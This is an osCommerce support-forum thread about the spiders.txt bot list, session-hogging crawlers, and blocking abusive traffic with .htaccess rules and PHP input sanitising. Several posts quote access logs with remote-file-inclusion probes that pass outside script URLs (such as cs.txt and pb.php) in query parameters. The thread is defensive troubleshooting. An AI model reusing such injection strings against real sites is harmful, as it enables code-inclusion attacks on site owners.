Updated spiders.txt Official Support Topic


stevel

Not really. I just figure it's a lot more data to read and loop through on every page access.

Thanks for the reply. I also have a question about bot names. The readme says: "For example, "ebot" matches Googlebot, "nbot" matches msnbot." Does this mean that these shortened names are now commonly understood by search engines when they spider a site?


No. The purpose of spiders.txt is for your osCommerce store to recognize when a spider is visiting so that it won't be assigned a session. There is no need, and no attempt, to identify which particular spider is visiting. For example, lots of spiders have the string "crawl" in their user agent (it may show as "Crawler", etc.). The string "crawl" matches all of them. Similarly, a number of spiders, including Googlebot, have the string "ebot", and non-spider visitors never (we hope) do. Therefore, any user agent string containing "ebot" as a substring is deemed a spider.

 

The search engines do not ever look at this file nor do they care. The only thing that matters is whether or not a spider is identified as a spider and a non-spider isn't incorrectly deemed a spider. The use of substrings is an attempt at optimizing the detection, that is all.
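
As a rough illustration of the substring idea described above, here is a minimal Python sketch. It is not the osCommerce code (the store itself is PHP); the function name `is_spider`, the three-entry list, and the sample user agent strings are assumptions made for the example, and the comparison is assumed to be case-insensitive.

```python
def is_spider(user_agent, spider_substrings):
    """Return True if any spiders.txt-style substring occurs in the user agent."""
    ua = user_agent.lower()
    # Skip empty entries so that a blank line in the list never matches everything.
    return any(s.lower() in ua for s in spider_substrings if s)


# Hypothetical excerpt; a real spiders.txt holds many more entries.
SPIDER_SUBSTRINGS = ["crawl", "ebot", "nbot"]

samples = [
    "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
    "msnbot/1.0 (+http://search.msn.com/msnbot.htm)",
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
]

for ua in samples:
    print(is_spider(ua, SPIDER_SUBSTRINGS), ua)
```

The first two sample agents match on "ebot" and "nbot"; the plain MSIE agent matches nothing, so that visitor would get a normal session.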


  • 2 months later...

Hello,

 

For a while now, a range of IP addresses has been visiting my site one page at a time and adding random products to a cart. The last octet of the IP address differs every time.

82.99.30.48 - - [04/Nov/2007:13:54:56 -0700] "GET /index.php?cName=accessories&osCsid=0e9cbf6e9135aebf9cefa420dfc61d1a HTTP/1.0" 200 39690 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

82.99.30.73 - - [04/Nov/2007:14:03:28 -0700] "GET /featured_products.php?osCsid=0e9cbf6e9135aebf9cefa420dfc61d1a HTTP/1.0" 200 46332 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

82.99.30.49 - - [04/Nov/2007:14:21:26 -0700] "GET /product_reviews.php?pName=adapt&products_id=317&language=en&osCsid=4bdff8b680aa49b36c5b88b40e7b1e2d HTTP/1.0" 200 36282 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

82.99.30.22 - - [04/Nov/2007:14:29:51 -0700] "GET /my_points_help.php?language=de HTTP/1.0" 200 45147 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

82.99.30.68 - - [04/Nov/2007:14:38:44 -0700] "GET /gv_faq.php?language=de HTTP/1.0" 200 34604 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

82.99.30.11 - - [04/Nov/2007:15:06:48 -0700] "GET /product_info.php?pName=adapt&osCsid=2fb4d1873b22d2bfd890af3d35bf0b54 HTTP/1.0" 200 42446 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

82.99.30.67 - - [04/Nov/2007:15:14:03 -0700] "GET /product_info.php?language=de&pName=control&cName=control&osCsid=2fb4d1873b22d2bfd890af3d35bf0b54 HTTP/1.0" 200 51933 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

82.99.30.4 - - [04/Nov/2007:16:01:19 -0700] "GET /index.php?sort=4a&page=1&cName=modules&osCsid=2fb4d1873b22d2bfd890af3d35bf0b54 HTTP/1.0" 200 42756 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

82.99.30.21 - - [04/Nov/2007:16:32:21 -0700] "GET /product_info.php?pName=kit-20&cName=kits&osCsid=ba8f7b14c77e6d9df1c521d15400e98b HTTP/1.0" 200 45094 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

 

etc...

What can I do about it?

 

Thanks.


  • 1 month later...

I'm having the same problem, but over a wide range of addresses. I have 40 to 50 different visitors with strange IP addresses. This started after I replaced my old spiders.txt file with the new one. Take a look at this; I need help.

 

00:08:30 0 Guest 99.228.214.14 03:02:48 03:02:48 /

00:08:29 0 Guest 24.71.223.148 03:02:49 03:02:49 /shopping_cart.php

00:08:21 0 Guest 24.71.223.148 03:02:57 03:02:57 /satellite-accessories-c-51.html

00:07:58 0 Guest 24.71.223.148 03:03:20 03:03:20 /satellite-accessories-satellite-finders-c-51_56.html

00:07:42 0 Guest 24.71.223.148 03:03:36 03:03:36 /font-color0000ffabout-c-59.html

00:07:30 0 Guest 99.228.214.14 03:03:48 03:03:48 /captiveworks-receivers-c-41.html

00:18:09 0 Guest 71.245.29.105 02:53:09 02:56:40 /satellite-accessories-satellite-motors-c-51_57.html

00:02:43 0 Guest 24.71.223.148 03:08:35 03:08:35 /shopping_cart.php

00:02:42 0 Guest 38.113.177.227 03:08:36 03:08:36 /other-electronics-electronics-c-38_37.html

00:00:08 0 Guest 76.64.204.111 03:11:10 03:11:10 /

00:00:38 0 Guest 216.197.133.146 03:10:40 03:10:40 /

00:11:05 0 Guest 142.177.229.37 03:00:13 03:00:13 /

00:10:49 0 Guest 24.71.223.148 03:00:29 03:00:29 /satellite-dishes-c-52.html

00:10:10 0 Guest 24.71.223.148 03:01:08 03:01:08 /captiveworks-receivers-c-41.html

00:09:54 0 Guest 24.71.223.148 03:01:24 03:01:24 /shopping_cart.php?sort=2a

00:09:34 0 Guest 24.71.223.148 03:01:44 03:01:44 /shopping_cart.php

00:09:26 0 Guest 24.71.223.148 03:01:52 03:01:52 /captiveworks-receivers-c-41.html

00:07:00 0 Guest 24.71.223.148 03:04:18 03:04:18 /create_account.php

00:02:01 0 Guest 24.71.223.148 03:09:17 03:09:17 /shopping_cart.php?sort=2a

00:02:17 0 Guest 24.71.223.148 03:09:01 03:09:01 /satellite-dishes-c-52.html

00:05:30 0 Guest 99.228.214.14 03:05:48 03:05:48 /captiveworks-receivers-c-41.html

00:09:06 0 Guest 24.71.223.148 03:02:12 03:02:12 /index.php

00:05:43 0 Guest 67.158.176.139 03:05:35 03:05:35 /

00:55:07 0 Guest 66.249.67.131 02:16:11 02:58:48 /advanced_search_result.php?keywords=digital+cameras&osCsid=7a3e

00:03:00 0 Guest 24.71.223.148 03:08:18 03:08:18 /index.php

00:03:25 0 Guest 24.71.223.148 03:07:53 03:07:53 /create_account.php

00:08:34 0 Guest 65.92.100.150 03:02:44 03:02:44 /

00:03:21 0 Guest 24.71.223.148 03:07:57 03:07:57 /create_account_success.php

00:08:51 0 Guest 24.71.223.148 03:02:27 03:02:27 /products_new.php

00:09:15 0 Guest 24.71.223.148 03:02:03 03:02:03 /shopping_cart.php?sort=2a

00:06:41 0 Guest 99.228.214.14 03:04:37 03:04:37 /captiveworks-receivers-c-41.html

00:14:13 0 Guest 142.177.229.37 02:57:05 02:57:05 /pansat-receivers-c-49.html

00:13:58 0 Guest 142.177.229.37 02:57:20 02:58:45 /advanced_search_result.php?keywords=digital+cameras&osCsid=7a3e

00:04:47 0 Guest 99.228.214.14 03:06:31 03:06:31 /captain-receivers-c-43.html

00:01:39 0 Guest 24.71.223.148 03:09:39 03:09:39 /login.php

00:01:54 0 Guest 38.113.177.227 03:09:24 03:09:24 /captiveworks-cw800s-receiver-p-174.html

00:16:06 0 Guest 142.177.229.37 02:55:12 03:00:07 /index.php?currency=USD&osCsid=8e5b46b96e49fd026113e76b774d8e0f

00:12:15 0 Guest 24.71.223.148 02:59:03 02:59:03 /

00:11:53 0 Guest 65.92.100.150 02:59:25 02:59:25 /

00:11:24 0 Guest 142.177.229.37 02:59:54 02:59:54 /other-electronics-cameras-c-38_28.html

00:11:15 0 Guest 142.177.229.37 03:00:03 03:00:03 /pansat-receivers-c-49.html

00:04:13 0 Guest 24.71.223.148 03:07:05 03:07:05 /create_account.php

00:02:09 0 Guest 38.113.177.227 03:09:09 03:09:09 /

00:10:23 0 Guest 24.71.223.148 03:00:55 03:00:55 /shopping_cart.php?sort=2a

Currently there are 44 customers online

 

 

 

Please help. This has been happening for the last 72 hours. Every time I check Who's Online I see this, with different numbers.


  • 2 weeks later...

Hi there. I've just installed the updated spiders-large.txt and renamed it to spiders.txt as instructed, but I'm still getting the bots shown in the image below. Any advice? I'm new to all this, so if you are able to explain it to me that would be great.

bots.jpg

 

Thank You

Regards

Ian


Looks as if my subscription to this topic expired again - sigh...

 

Ian,

 

The purpose of spiders.txt is NOT to prevent bots from spidering your site. Rather, it is to ensure that said bots don't get sessions so that they don't include session IDs in the links they index and that they stay out of functions that require a session (such as Add to Cart).

 

Irina,

 

The entries you show come from (or are pretending to come from) a user's browser. I agree that it looks suspicious, but there's nothing that spiders.txt can do for you since the user agent string is that of a normal browser. What you can do is add a "Deny from" entry to your .htaccess file to block access from this IP range (82.99.30).
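
Before blocking a range it can help to check which logged addresses it would actually cover. The sketch below is only an illustration in Python, not something the store runs. It assumes that the partial address 82.99.30 covers the same hosts as the network 82.99.30.0/24, which is how a three-octet partial address in an Apache "Deny from" line is normally understood; the helper name `in_suspect_range` is made up for the example.

```python
import ipaddress

# Assumption: the partial address "82.99.30" is equivalent to this /24 network.
SUSPECT_RANGE = ipaddress.ip_network("82.99.30.0/24")


def in_suspect_range(ip):
    """Return True if the dotted-quad address falls inside the suspect range."""
    return ipaddress.ip_address(ip) in SUSPECT_RANGE


# Addresses taken from the logs posted earlier in this topic.
for ip in ["82.99.30.48", "82.99.30.4", "24.71.223.148"]:
    print(ip, in_suspect_range(ip))
```

Only the first two addresses fall in the range, so visitors such as 24.71.223.148 would not be affected by the block.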

 

irfan (beaman),

 

We would need to see the access log entries. A "Who's online" report is not sufficient. I'll comment that many of these look like normal users (cable modem customers, etc.).


  • 3 weeks later...

Doesn't seem to be a regular spider. Could be someone writing code based on Amazon Web Services. I will check my logs to see if I have hits from this, but a check of yesterday's log doesn't show anything.

 

What are you seeing - spider-like activity over many links? Please provide some sample lines from the web access log.


I am about to block the IP address, but I really don't want to.

 

 

Not sure how to provide the web access log, but here is a sample of what I think you want:

 

/-p-100.html?language=es

Http Code: 200 Date: Jan 08 12:39:59 Http Version: HTTP/1.0 Size in Bytes: 15209

Referer: http://www.ganodermacoffee.com/product_inf...products_id=100

Agent: Mozilla/5.0 (compatible; heritrix/1.12.1 +http://www.page-store.com) [email:[email protected]]

 

 

/-p-99.html?language=es

Http Code: 200 Date: Jan 08 12:40:12 Http Version: HTTP/1.0 Size in Bytes: 15201

Referer: http://www.ganodermacoffee.com/-p-99.html

Agent: Mozilla/5.0 (compatible; heritrix/1.12.1 +http://www.page-store.com) [email:[email protected]]

 

 

/-p-99.html?language=en

Http Code: 200 Date: Jan 08 12:40:22 Http Version: HTTP/1.0 Size in Bytes: 15790

Referer: http://www.ganodermacoffee.com/-p-99.html

Agent: Mozilla/5.0 (compatible; heritrix/1.12.1 +http://www.page-store.com) [email:[email protected]]

 

 

 

/-pr-99.html

Http Code: 200 Date: Jan 08 12:40:33 Http Version: HTTP/1.0 Size in Bytes: 13829

Referer: http://www.ganodermacoffee.com/-p-99.html

Agent: Mozilla/5.0 (compatible; heritrix/1.12.1 +http://www.page-store.com) [email:[email protected]]

 

 

 

/-p-102.html?language=es

Http Code: 200 Date: Jan 08 12:40:47 Http Version: HTTP/1.0 Size in Bytes: 15215

Referer: http://www.ganodermacoffee.com/product_inf...products_id=102

Agent: Mozilla/5.0 (compatible; heritrix/1.12.1 +http://www.page-store.com) [email:[email protected]]

 

 

 

/-p-102.html?language=en

Http Code: 200 Date: Jan 08 12:41:05 Http Version: HTTP/1.0 Size in Bytes: 15843

Referer: http://www.ganodermacoffee.com/product_inf...products_id=102

Agent: Mozilla/5.0 (compatible; heritrix/1.12.1 +http://www.page-store.com) [email:[email protected]]

 

 

 

-----------------------

 

01:39:40 Guest ec2-72-44-49-100.z-1.compute-1.amazonaws.com 11:10:13 12:49:53 Gano Coffee Club (Product) Yes Yes

Name: Guest

 

ID: 0

 

IP Address: 72.44.49.100

 

User Agent: Mozilla/5.0 (compatible; heritrix/1.12.1 +http://www.page-store.com) [email:[email protected]]

 

osCsid: 49a31cd29bce4cd3e1e32bc4ff5462e6

 

------------------

 

It seems to just keep cycling through the products and adding 1 to the cart and now it has started to add a second item to the cart for each product.

 

 

 

Referer?: http://www.ganodermacoffee.com/


Ah. This should be caught by the "heritrix" entry in spiders.txt, so it should not be getting a session. Perhaps your store is not configured to use it?

 

I would feel better if I saw entries from an actual access log.


  • 2 weeks later...

I noticed some suspicious activity on my web site. It's either a spider or a continuously running script. It visits my web site throughout the day, makes one click at a time, and always uses a different IP. It's hard to block because the IP changes all the time. Here is what I have in my access_log:

 

67.68.206.67 - - [30/Jan/2008:05:33:36 -0700] "GET /product_info.php?pName=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 72027 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

67.68.206.67 - - [30/Jan/2008:05:34:07 -0700] "GET /index.php?sort=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 48317 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

70.53.156.125 - - [30/Jan/2008:05:41:44 -0700] "GET /product_info.php?pName=http://laudanskisucksss.chat.ru/placeholder/image? HTTP/1.1" 200 72141 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

70.53.156.125 - - [30/Jan/2008:05:41:52 -0700] "GET /product_info.php?pName=http://laudanskisucksss.chat.ru/placeholder/image? HTTP/1.1" 200 72170 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

70.53.156.125 - - [30/Jan/2008:05:42:34 -0700] "GET /index.php?sort=http://laudanskisucksss.chat.ru/placeholder/image? HTTP/1.1" 200 48422 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

70.53.156.125 - - [30/Jan/2008:05:42:34 -0700] "GET /index.php?sort=http://laudanskisucksss.chat.ru/placeholder/image? HTTP/1.1" 200 48471 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

124.104.84.192 - - [30/Jan/2008:05:43:32 -0700] "GET /product_info.php?language=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 200 67772 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)"

124.104.84.192 - - [30/Jan/2008:05:43:45 -0700] "GET /product_info.php?pName=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 200 66375 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)"

64.231.108.203 - - [30/Jan/2008:05:51:28 -0700] "GET /product_info.php?pName=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 71998 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

64.231.108.203 - - [30/Jan/2008:05:51:30 -0700] "GET /product_info.php?pName=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 72027 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

64.231.108.203 - - [30/Jan/2008:05:51:30 -0700] "GET /product_info.php?pName=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 71998 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

64.231.108.203 - - [30/Jan/2008:05:51:32 -0700] "GET /product_info.php?pName=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 12945 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

64.231.108.203 - - [30/Jan/2008:05:52:13 -0700] "GET /index.php?sort=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 48219 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

64.231.108.203 - - [30/Jan/2008:05:52:13 -0700] "GET /index.php?sort=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 48256 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

64.231.108.203 - - [30/Jan/2008:05:52:15 -0700] "GET /index.php?sort=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 48399 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

64.231.108.203 - - [30/Jan/2008:05:52:21 -0700] "GET /index.php?sort=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 12945 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

69.159.62.217 - - [30/Jan/2008:06:20:32 -0700] "GET /index.php?sort=http://cherrygirl.h18.ru/images/cs.txt? HTTP/1.1" 200 48296 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; pt-BR; rv:1.7.7) Gecko/20050414 Firefox/2.0.5"

124.104.84.192 - - [30/Jan/2008:06:37:02 -0700] "GET /product_info.php?language=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 200 67776 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)"

124.104.84.192 - - [30/Jan/2008:06:37:17 -0700] "GET /product_info.php?pName=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 200 66337 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)"

67.68.206.67 - - [30/Jan/2008:07:15:23 -0700] "GET /product_info.php?pName=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 72027 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

 

and so on...

 

Can anybody please explain what's going on and if there is something I can do about it? Any help will be appreciated. Thanks.


It's looking to see if it can use your site for redirecting URLs in spam emails.

 

If you are not using the "Visit this product's web site" feature, you can do this. Add this code to your .htaccess file:

 

RewriteEngine On

RewriteCond %{QUERY_STRING} :/ [NC]
RewriteRule ^ - [F]

 

If you already have the RewriteEngine line in there, you don't repeat it.

 

This will cause all attempts to access your site with a URL in the parameters to fail.
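
To see which requests the rule above would reject, here is a rough Python sketch of the same test. It is only an illustration, not Apache's implementation: it assumes the pattern is searched for in the raw (not URL-decoded) query string, the name `would_be_forbidden` is made up, and the redirect.php URL at the end is a hypothetical example rather than one taken from a real store.

```python
import re

# Same pattern as the RewriteCond: ":/" anywhere in the query string ([NC] = ignore case).
URL_IN_QUERY = re.compile(r":/", re.IGNORECASE)


def would_be_forbidden(request_path):
    """Return True if the part after the first '?' contains a literal ':/'."""
    _, _, query = request_path.partition("?")
    return bool(URL_IN_QUERY.search(query))


requests = [
    # Probe taken from the access log posted above.
    "/product_info.php?pName=http://hotraebywka.chat.ru/images/girl?",
    # Ordinary catalogue request from an earlier log in this topic.
    "/index.php?sort=4a&page=1&cName=modules",
    # Hypothetical link whose target URL is percent-encoded.
    "/redirect.php?action=url&goto=http%3A%2F%2Fexample.com%2Fpage.html",
]

for r in requests:
    print(would_be_forbidden(r), r)
```

Under that assumption only the first request is rejected. A link whose target is percent-encoded contains no literal ":/" in the raw query string, so it would pass through.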


Hi Stevel,

 

Is this the feature on product_info.php "For more information, please visit this products webpage."? If yes, I do use it. I added your code to my .htaccess file. Do you think it'll prevent the script from running?

 

Thanks for your help.


Yes, that's the feature. You'll probably find that those links stop working. It can be worked around by changing the URL used so that it does not include the "http://" part.


Stevel,

 

Thanks a lot for your help. Since I added your code to my .htaccess file, I don't see any more strange URLs accessing my web site. It stopped all the attempts of using my web site for suspicious purposes. The redirect feature also seems to be working fine, the URL used to redirect to the web page is http://myshop.com/redirect.php?action=url&...cts%2Fpage.html. Thanks to you I got this problem sorted.

 

Thanks again.


You're welcome. You should see "403" (Forbidden) errors show up in the log, but you'll see a lot fewer of those over time. You can rest assured that this closes off one possible way for spammers to abuse your site.


Yep, I can see some "403" errors in my log but they are all for these strange URLs.

 

70.51.76.179 - - [30/Jan/2008:12:42:17 -0700] "GET /index.php?sort=http://ninaru.hut2.ru/images/cs.txt? HTTP/1.1" 403 307 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)"

76.67.138.251 - - [30/Jan/2008:12:37:56 -0700] "GET /index.php?sort=http://0xg3458.hub.io/pb.php? HTTP/1.1" 403 307 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)"

76.67.138.251 - - [30/Jan/2008:12:37:05 -0700] "GET /product_info.php?pName=http://0xg3458.hub.io/pb.php? HTTP/1.1" 403 314 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)"

64.229.149.191 - - [30/Jan/2008:12:33:45 -0700] "GET /index.php?sort=http://migirlinme.krovatka.su/index? HTTP/1.1" 403 307 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

 

Some other URLs are showing up in my log file; maybe you know what they are:

 

196.217.86.107 - - [30/Jan/2008:12:53:45 -0700] "GET /osCommerce/images/prod.jpg HTTP/1.1" 301 366 "http://all-patch.org/vb/showthread.php?p=764145#post764145" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iOpus-I-M; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727; MEGAUPLOAD 2.0)"

212.76.72.252 - - [30/Jan/2008:12:54:23 -0700] "GET /osCommerce/images/prod.jpg HTTP/1.1" 301 366 "http://www.bramjnet.com/vb3/showthread.php?t=99710" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SIMBAR={7B7C664E-CCE9-11DC-A053-000FB0E14566}; .NET CLR 1.1.4322; InfoPath.2; .NET CLR 2.0.50727)"

212.76.72.252 - - [30/Jan/2008:12:54:24 -0700] "GET /images/prod.jpg HTTP/1.1" 200 9061 "http://www.bramjnet.com/vb3/showthread.php?t=99710" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SIMBAR={7B7C664E-CCE9-11DC-A053-000FB0E14566}; .NET CLR 1.1.4322; InfoPath.2; .NET CLR 2.0.50727)"

 

Again, thanks for your help.


Using .htaccess really (imo) ought to be a last, dirty resort in these cases. After all, we are talking about simply sanitising the $_GET variable. (Maybe you set $_REQUEST = $_GET + $_POST, after sanitising of course, like me .. who needs $_COOKIE, for God's sake?)

 

$_GET is often multidimensional so why not use a recursive cleaner, something like ..

 

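$_GET = clean_get__recursive($_GET);

function clean_get__recursive($get_var)
{
    // Recurse into arrays so that nested parameters are cleaned too.
    if (is_array($get_var)) {
        return array_map('clean_get__recursive', $get_var);
    }

    // Strip everything except letters, digits, space, underscore, dot and hyphen.
    return preg_replace('/[^a-zA-Z0-9 _.-]/', '', $get_var);
}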

 

The preg_replace may be too heavy for some but the concept is sound.


Robert, that's an interesting idea but it doesn't signal to the spammers that they should go away. There's no legitimate purpose to having :/ in a $_GET parameter so the .htaccess takes care of it simply.


Perhaps a nice little error page saying #!@#! off! :D

 

Anyway .. I'm leading this thread off topic .. back to spiders.txt I think.


GAH! Livebot BEGONE!

 

I'm having hassles with livebot (livebot-65-55-165-14.search.live.com and others) impersonating real customers by using this useragent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322). This bot annoys me because it creates sessions (thereby putting osc session IDs in its index), adds things to the cart (making me excited that someone's about to buy something, then disappointing me when I realise what's going on) and doesn't play nice with spiders.txt.

 

Any idea how I can prevent this bot from creating sessions?

 

Cheers,

Max


If it uses the same IP every time, just ban the IP from your site. I believe there is an add-on for it, or you can use .htaccess: http://tools.dynamicdrive.com/userban/ IP bans are not a 100% remedy and can easily ban a potential customer if you are not careful.
